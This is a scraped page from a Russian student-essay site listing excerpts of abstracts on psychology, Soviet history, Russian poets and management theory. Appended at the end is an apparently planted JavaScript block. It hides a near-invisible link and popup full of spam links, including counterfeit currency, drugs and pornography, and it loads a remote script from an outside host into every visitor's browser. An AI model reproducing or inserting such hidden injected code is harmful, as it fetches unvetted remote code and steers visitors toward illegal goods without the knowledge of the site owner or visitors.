Понедельник, 20.05.2019
Опросник
Какие работы вы хотите скачивать?
Всего ответов: 4
Система учета

Онлайн всего: 1
Гостей: 1
Пользователей: 0
Главная » 2011 » Ноябрь » 11
1 из 4

Введение

Ученые прогнозируют, что XXI век будет веком психологии, и явные тенденции, подтверждающие эти утверждения, мы видим уже сегодня: стремительно оформляются различные виды практико-психологической помощи населению. Таким образом, в ближайшее время будут востребованы специалисты-психологи, оказывающие эту помощь.

Психологи сопровождают человека (во всяком случае, в развитых странах) от колыбели до кладбища. Сегодня в западных социальных службах появляются новые специальности - специалист по психокоррекции трудновоспитуемых детей и психотерапевты, которые помогают пережить утрату близких. Не говоря уже о том, что психологи участвуют в бизнесе - от разработки продукта до его реализации.

Глубокое знание психологии никогда не подводило: даже выпускники психфаков советских вузов, часто не имевшие возможности устроиться непосредственно по специальности, пользуясь осведомле ... Читать дальше »

Просмотров: 125 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 3

Введение

Леонид Ильич Брежнев родился 19 декабря 1906 года в семье рабо­чего-металлурга. Однако, несмотря на рабочее происхождение и раннее на­чало трудовой деятельности (в 1921 году 15-ти лет от роду), он не зареко­мендовал себя активным общественным деятелем.

Брежнев был в целом человеком благожелательным, он не любил осложнений и конфликтов ни в политике, ни в личных отношениях со своими коллегами. Когда такой конфликт все же возникал, Брежнев старался избежать экстремальных решений.

При конфликтах внутри руководства лишь очень немногие из людей отправлялись на пенсию. Большинство "опальных" руководителей оставалось в "номенклатуре", но лишь на 2-3 ступени ниже. Член Политбюро мог стать заместителем министра, а бывший министр, секретарь обкома партии, член ЦК КПСС направлялся послом в небольшую страну: Данию, Бельгию, Австралию, Норвегию.

... Читать дальше »

Просмотров: 107 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 7

Введение

Занятия физической культурой и спортом дарят человеку счастье, здоровье, силу, гибкость, умение владеть своим телом и собой.

Никогда и никому не поздно познать радость занятий физической культурой и различными видами спорта. Но приступать к ним, конечно, лучше раньше, чем появились первые признаки болезней или снижения работоспособности. Однако и многочисленные «болезни века» не помеха для начинающего физкультурника.

Каждый человек сознает благотворную роль физических упражнений. Однако не для всех еще они стали постоянными спутниками жизни. Объясняя это явление, социологи называют разные причины: лень, отсутствие времени, условий для занятий и т.п. Вместе с тем многие люди хотели бы заниматься физкультурой в свободное от работы или учебы время, но не знают, как это сделать.

Цель работы - ознакомиться со способами улучшения произв ... Читать дальше »

Просмотров: 157 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 7

Введение

       В процессе познания и деятельности человек получает массу впечатлений, причем многие раздражители действуют на мозг одновременно Сознание не может с одинаковой ясностью отразить все воспри­нимаемые и мыслимые объекты.  Биологически и социально важ­но для человека ясно отразить один два наиболее значимых раздражителя, действующих в данный момент на органы чувств. Во взаимодействии со средой сложилось избирательное отражение предметов, обеспечиваемое вниманием.

      Среди психических явлений внимание занимает особое место оно не самостоятельный психический процесс и не относится к свойствам личности В то же время внимание всегда включено в познавательные процессы или практическую деятельность че­ловека и выражает интересы, направленность личности. Внимание выступает в жизни как сторона психической деятельност ... Читать дальше »

Просмотров: 97 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 3

Введение

Цель данной работы: Рассмотреть лоббизм как политическое явления, охарактеризовать его законодательное регулирования в США.

Лоббизм как бы дополняет конституционную систему демократического представительства, позволяя участвовать в принятии и реализации политических решений тем группам, которые не имеют другой такой возможности. Поскольку парламент формируется по территориальным округам и партийным спискам, огромное количество самых разнообразных общественных групп, каждая со своим особенным интересом, не может его, свой интерес, артикулировать, выставляя собственных депутатов. Вместе с тем, ее интерес может быть узко партикулярным, так и иметь большое общественное значение.

Таким образом, через систему и практику лоббизма получают свое выражение и представительство в общенациональном масштабе интересы, которые в ином случае остались бы невыраженн ... Читать дальше »

Просмотров: 188 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 8

...Моим стихам, как драгоценным винам

Настанет свой черед.

М. Цветаева

Русская поэзия наше великое духовное достояние, наша национальная гордость. Но многих поэтов и писателей забыли, их не печатали, о них не говорили. В последнее время многие несправедливо забытые имена стали к нам возвращаться, их стихи и произведения стали печатать. Это такие замечательные русские поэты, как Анна Ахматова, Николай Гумилев, Осип Мандельштам, Марина Цветаева.

Марина Ивановна Цветаева родилась в Москве 26 сентября 1892 года. По происхождению, семейным связям, воспитанию она принадлежала к трудовой научно-художественной интеллигенции. Если влияние отца, Ивана Владимировича, университетского профессора и создателя одного из лучших московских музеев (ныне музея Изобразительных Искусств), до поры до времени оставалось скрытым, подспудным, то мать, Мария Александровна, ... Читать дальше »

Просмотров: 123 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 10

Проблема агрессивного поведения остается актуальной на протяжении всего существования человечества в связи с его распространенностью и дестабилизирующим влиянием. Имеются представления о том, что агрессивность имеет исключительно биологическое происхождение, а также о том, что она связана главным образом с проблемами воспитания и культурой.

Агрессия представлена множественными терминами в обыденной речи. Агрессия "доброкачественная" (настойчивость, напористость, спортивная злость, мужество, смелость, храбрость, отвага, воля, амбиции), агрессия "злокачественная" (насилие, жестокость, наглость, хамство, нахрап, зло) и собственно агрессивный, деструктивный тип агрессии (по Фромму).

Деструктивная агрессия всегда ассоциировалась с таким философско-нравственным понятием как зло. Дискуссии о том, является ли зло имманентным для человека, или он по природе своей добр, продолжались в течение многовековой истории челов ... Читать дальше »

Просмотров: 97 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 8

Эволюция управленческой мысли. Основные подходы к развитию теории и практики управления

Выполнение управленческих функций обязательно если организация собирается добиться успеха. Практика управления так же стара, как организации, а это означает, что она действительно очень древняя. На глиняных табличках датированных третьим тысячелетием до нашей эры записаны сведения о коммерческих сделках и законах древней Шумерии, являя собой, четкое доказательство существования там практики управления» По археологическим раскопкам можно проследить и более древние доказательства существования организаций: даже до исторические люди часто жили организованными группами.

Однако, как управление, так и организации древности сильно отличались от тех, что описаны в нашей школе. Хотя само управление старо как мир, идея управления как научной дисциплины, профессии области исследований - относительно нова. Управлен ... Читать дальше »

Просмотров: 106 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 5

 Далее в работе события датированы годами до нашей эры.

494 г. - На сцене Афинского театра поставлена трагедия Фриниха "Взятие Милета"

По инициативе Фемистокла на сцене Афинского театра была поставлена трагедия Фриниха "Взятие Милета". Страшные сцены гибели прекрасного города, страдания жителей, оплакивающих своих близких, сцены насилия и порабощения потрясли зрителей, убедили их, что угроза нападения со стороны Персии вполне реальна.

Благодаря этой постановке Фемистокл завоевал доверие многих своих сограждан, и вскоре он был избран в архонты.

480 г. - Первое состязание авторов комедий

Впервые в театральные игры введены состязания авторов комедий. Позже время от времени государство пыталось ограничить свободу творчества комедийных поэтов, но афинский народ, особенно афинские земледельцы, отстаивали свой любим ... Читать дальше »

Просмотров: 91 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 9

1.  Вступление

2.  Происхождение названия «Русь»

3.  Социально-экономический и государственный строй Киевской Руси ІХ-Х ст

4. Развитие государственности Руси в первой половине Х ст

5. Экономическая жизнь Киевской Руси

6. Сельское хозяйство и промыслы

7.  Феодализация крестьян и земельные отношения

8. Финансы

9. Заключение

10. Список литературы

 

Вступление

      Свыше одиннадцати веков тому  восточные  славяне  создали  свое  первое государство. Летописи и другие памятки  древнерусской  литературы  называют  ее Русью, или Рус ... Читать дальше »

Просмотров: 111 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 8

"Нет, не пейзаж влечет меня,

Не краски я стремлюсь подметить,

А то, что в этих красках светит,

Любовь и радость бытия".

И. Бунин

Иван Алексеевич Бунин родился 23 октября 1870 года (10 октября по старому стилю) в Воронеже, на Дворянской улице. Обнищавшие помещики Бунины принадлежали знатному роду, среди их предков - В. А. Жуковский и поэтесса Анна Бунина.

В Воронеже Бунины появились за три года до рождения Вани, для обучения старших сыновей: Юлия (13 лет) и Евгения (12 лет). Юлий, на редкость способный к языкам и математике, учился блестяще, Евгений учился плохо, вернее, совсем не учился, рано бросил гимназию; он был одаренным художником, но в те годы живописью не интересовался, больше гонял голубей. Что же касается младшего, то мать его, Людмила Александровна, всегда говорила, что "Ваня с са ... Читать дальше »

Просмотров: 106 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 5

Введение

Поражение декабристов и усиление полицейско-репрессивной политики правительства не привели к спаду общественного движения. Напротив, оно еще более оживилось. Центрами развития общественной мысли стали различные петербургские и московские салоны (домашние собрания единомышленников), кружки офицеров и чиновников, высшие учебные заведения (в первую очередь, Московский университет), лите­ратурные журналы: "Москвитянин", "Вестник Европы", "Отечественные записки", "Современник" и другие. В общественном движении второй четверти XIX в. началось размежевание трех идейных направлений: радикального, либерального и консервативного. В отличие от предыду­щего периода активизировалась деятельность консерваторов, защищав­ших существовавший в России строй.

В целом вторая четверть XIX в. была временем "наружного работа" и "внутреннею освобождения". Одни - молчали, напуганные правитель­ств ... Читать дальше »

Просмотров: 110 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 7

Введение

А.Н. Леонтьев останется в истории психологии, прежде всего, как автор оригинальной психологической теории деятельности. Именно с нею ассоциируется имя Алексея Николаевича и в глазах мирового психологического сообщества. Однако его труды были посвящены и другим фундаментальным психологическим проблемам, среди которых - психология памяти, проблемы развития психики, отражения (гипотеза уподобления), сознания, психология личности, психологические проблемы обучения и др.

А.Н. Леонтьев был не только сильным теоретиком, но и блестящим экспериментатором, которому удалось осуществить ряд интереснейших экспериментальных замыслов (например, исследование генезиса чувствительности, развитие звуковысотного слуха и др.).

Талант А.Н. Леонтьева проявился на поприще не только разработки новых научных идей, но и организационно-административной деятельности. В 1967 г. благодаря усили ... Читать дальше »

Просмотров: 104 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 6

Введение

Личность, как и все специфически человеческое в психике формируется и раскрывается в ходе активного взаимодействия с окружающей и предметной средой, путем усвоения или присвоения индивидом общественно выработанного опыта. В этом опыте непосредственно к личности относятся системы представлений о нормах и ценностях жизни - об общей направленности человека, отношениях к другим, к себе, к обществу и пр.

В разные времена и в разных культурах  системы представлений о нормах и ценностях жизни различны, но смысл их от этого не меняется и может выражаться посредством понятий «объективного предбытия» или «социальных планов (программ)» личности. Общество организует специальную активность, направленную на реализацию этих планов. Но каждый индивид тоже активен, и активность общества встречается с его активностью.

Личность чаще всего опред ... Читать дальше »

Просмотров: 136 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 5

Одним из важнейших элементов характеристики человека является его речь. Еще древний философ Плутарх заметил, что «в речи гораздо более, нежели в лице, Как думают некоторые, открывается характер человека». Речь несет в себе информацию сразу о нескольких очень важных особенностях человека. Так, например, сложность и правильность языка свидетельствует об уровне образования (или самообразования) и культуры, содер­жание речей - об уме и нравственности, а богатство и характер интонаций говорят об эмоциональности и настроении человека.

Мы обращаем внимание не только на содержание речи человека, но и на то, как она произносится: с какой интонацией, громкостью, отчетливостью, звонко или «сквозь зубы», уверенно или с нервным смешком и т.п. Все эти явления изучаются паралингвистикой.

Рассмотрим последовательно паралингвистические явления, наиболее значимые для понимания эмоционального состояния, ... Читать дальше »

Просмотров: 92 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 9

Введение

Вопрос о психологических особенностях представителей мужского и женского пола является более трудным и сложным, чем вопрос о биологических и физиологических особенностях и о различиях.

Особенности полового диморфизма в когнитивной деятельности изучены мало. В доступной педагогической и психологической литературе в последние десятилетия мы не встретили научных работ на эту тему. Периодическая же печать нередко к ней обращается, справедливо улавливая ее интерес и практическое значение для педагогического процесса. В связи с этим и мы в своей работе хотим затронуть значимость этого вопроса для обучения  в начальной школе. Отсюда цель нашей работы показать значимость использования полового диморфизма в когнитивной деятельности младшего школьного возраста.

Для достижения цели были поставлены следующие задачи:


1 из 9

Содержание

Введение

Раздел І. Социально-психологические аспекты гештальт-психологии

1.1.  Суть гештальт-психологии

1.2.  Физические гештальты и инсайт

1.3. Значение гештальтпсихологии

ІІ. 1. Гештальт-подход в терапии

ІІ. 2. Теория гештальт-терапии основывается на следующих положениях

ІІ. 3. Основные принципы философии и теории гештальт-терапии

Заключение

Список использованной литературы

 

Введение

Гештальтпсихология (Gestalt - целостная форма, структура) развилась вследствие протеста против бихевиоризма и существовавших ранее психологических направлений. Если удастся понять суть гештальтпсихологии, то мы приблиз ... Читать дальше »

Просмотров: 109 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 6

Введение

              Память  - это умственная деятельность. Проявляется она в закреплении, сохранении и последующем воспроизведением человеком того, что уже было зафиксировано в его сознании. Благодаря, памяти мы имеем возможность постоянно расширять круг своих знаний и пользоваться ими по мере надобности.

  Память является основным условием успешного обучения и воспитания индивида, в то же время, и сама развивается в процессе обучения и воспитания. Значение памяти в жизни человека огромна, без нее была бы невозможна никакая деятельность. И. М. Сеченов указывает, что без памяти наше ощущение и восприятие исчезают бесследно по мере возникновения, оставляют человека вечно в положении новорожденного. Если у человека проблемы с памятью возникают проблемы обучения, трудовой деятельности, приобретения простейших бытовых навык ... Читать дальше »

Просмотров: 111 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 5

Как воспитатель учитель постоянно сталкивается с разнообразными педагогическими ситуациями, когда от него требуется глубокое понимание их социально-психологического смысла, умение самостоятельно принять решение. Для этого учителю необходимы не только глубокие знания учебного предмета, но и психолого-педагогические знания, в частности знания психологических особенностей учащихся разных возрастных групп, закономерностей и условий оптимизации процесса их обучения и воспитания.

Исходя из данной  концепции, были выбраны, на мой взгляд, наиболее важные понятия, включенные в отрасль педагогической психологии: обучение, воспитание, социализация.

а)  Обучение.

Педагогическая деятельность в целом является сложно организованной системой ряда деятельностей. И самая первая из них - обучающая, непосредственная деятельность преподавателя. Остальные обслуживают ее: методическая деятельность и дея ... Читать дальше »

Просмотров: 99 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (2)

1 из 7

Искусство Врубеля, как поэзия Лермонтова, находит отклик у молодых. В духовном развитии подростков бывает «лермонтовский» период, когда втайне отождествляются с Печориным, когда лирику Лермонтова предпочитают всякой другой, даже пушкинской. А те, кто восприимчив к живописи, в это время открывают для себя Врубеля.

С возрастом приходит более зрелое понимание его живописи, но, чтобы оно пришло, первая встреча с ним должна состояться в молодые годы: не испытав в юности обаяния Врубеля, потом наверстать уже трудно.

Ранние годы

Если ничего не знать о Врубеле, кроме его картин, можно вообразить его похожим на Демона. Но, как свидетельствовали хорошо знавшие его люди, ничего демонического не было ни в характере, ни в наружности Михаила Александровича Врубеля. В его характере коренилась какая-то вечная невзрослость, беспечная нерасчетливость. Это был человек мгновенных ... Читать дальше »

Просмотров: 152 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

1 из 7

Введение

Каждому из нас приходилось заниматься изучением языков. Мы изучали родной язык, иностранный, многие изучают языки программирования, другие изучают международный язык эсперанто. Но существует еще один международный, общедоступный и понятный язык, о котором до недавнего времени мало что знали - это язык жестов, мимики, телодвижений человека.

Содержанием общения может стать информация о состоянии внешней среды. У человека содержание общения значительно шире, чем у животных. Люди обмениваются друг с другом информацией, представляющей знания о мире, богатый, прижизненно приобретенный опыт, знания, способности, умения и навыки. Человеческое общение многопредметно, оно самое разнообразное по своему содержанию.

Впервые серьезным исследованием этого языка занялся в конце 70-х годов Аллан Пиз, который является признанным знатоком психологии человеческого общения. Психологами ... Читать дальше »

Просмотров: 92 | Добавил: petruha | Дата: 11.11.2011 | Комментарии (0)

Поиск
Календарь
«  Ноябрь 2011  »
ПнВтСрЧтПтСбВс
 123456
78910111213
14151617181920
21222324252627
282930
Архив работ
Tuchka.At.Ua © 2019
(function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var popupHtml = "
tattooing on fake skin<\/a> <\/div>
www.solongtattoo.com<\/span> <\/div> <\/div>
matrix costume<\/a> <\/div>
www.coserworld.com<\/span> <\/div> <\/div> <\/div>
drones \u03bc\u03b5 \u03ba\u03b1\u03bc\u03b5\u03c1\u03b1 \u03c4\u03b9\u03bc\u03b7<\/a> <\/div>
gr.newtechstore.eu<\/span> <\/div> <\/div>
service dog training ft lauderdale<\/a> <\/div>
samivy.com<\/span> <\/div> <\/div> <\/div>
halkidiki smestaj cene<\/a> <\/div>
www.aquatravel.rs<\/span> <\/div> <\/div>
main event party specials<\/a> <\/div>
www.maineventcabo.com<\/span> <\/div> <\/div> <\/div>
zapper parasites australia immigration<\/a> <\/div>
www.zapperstore.com<\/span> <\/div> <\/div>
beach homes for sale baja california<\/a> <\/div>
bajaproperties.com<\/span> <\/div> <\/div> <\/div>
hasil keluaran togel sidney<\/a> <\/div>
infotogel88.com<\/span> <\/div> <\/div>
zenfolio seo services<\/a> <\/div>
semalt.com<\/span> <\/div> <\/div> <\/div>
rallye urbain mont\u00e9limar<\/a> <\/div>
www.urbangames.fr<\/span> <\/div> <\/div>
fake euro bills for sale online<\/a> <\/div>
www.counterfeitdoc.com<\/span> <\/div> <\/div> <\/div>
gomme continental 225 45 r17<\/a> <\/div>
fs.ee<\/span> <\/div> <\/div>
cryptocurrency lending platforms 2018<\/a> <\/div>
coinloan.io<\/span> <\/div> <\/div> <\/div>
www pinay scandal sex com<\/a> <\/div>
xnxxcom.co<\/span> <\/div> <\/div>
molly purity test kit<\/a> <\/div>
ecstasymdma.com<\/span> <\/div> <\/div> <\/div>
dr who ace<\/a> <\/div>
www.acefamilydental.com<\/span> <\/div> <\/div>
tricoptere drone<\/a> <\/div>
fr.newtechstore.eu<\/span> <\/div> <\/div> <\/div>
auberge cabo<\/a> <\/div>
www.karlacasillas.com<\/span> <\/div> <\/div>
order window blinds<\/a> <\/div>
www.buyhomeblinds.com<\/span> <\/div> <\/div> <\/div>
\u10e8\u10d4\u10d8\u10eb\u10d8\u10dc\u10d4\u10d7 \u10d1\u10d8\u10dc\u10d4\u10d1\u10d8<\/a> <\/div>
ge.batumiexpert.com<\/span> <\/div> <\/div>
marketing Trattnach<\/a> <\/div>
semalt.com<\/span> <\/div> <\/div> <\/div>
\u043d\u0435\u0434\u0432\u0438\u0436\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0411\u0430\u0442\u0443\u043c\u0438<\/a> <\/div>
batumiexpert.com<\/span> <\/div> <\/div> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var popupCreated = false; function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:medium; line-height:normal;'); sheet.addRule('.shbNetPopupTable a', 'text-decoration:none; background:none; height:auto !important;'); } function tryCreatePopup(stage) { if (popupCreated) return; if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '437px', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} })();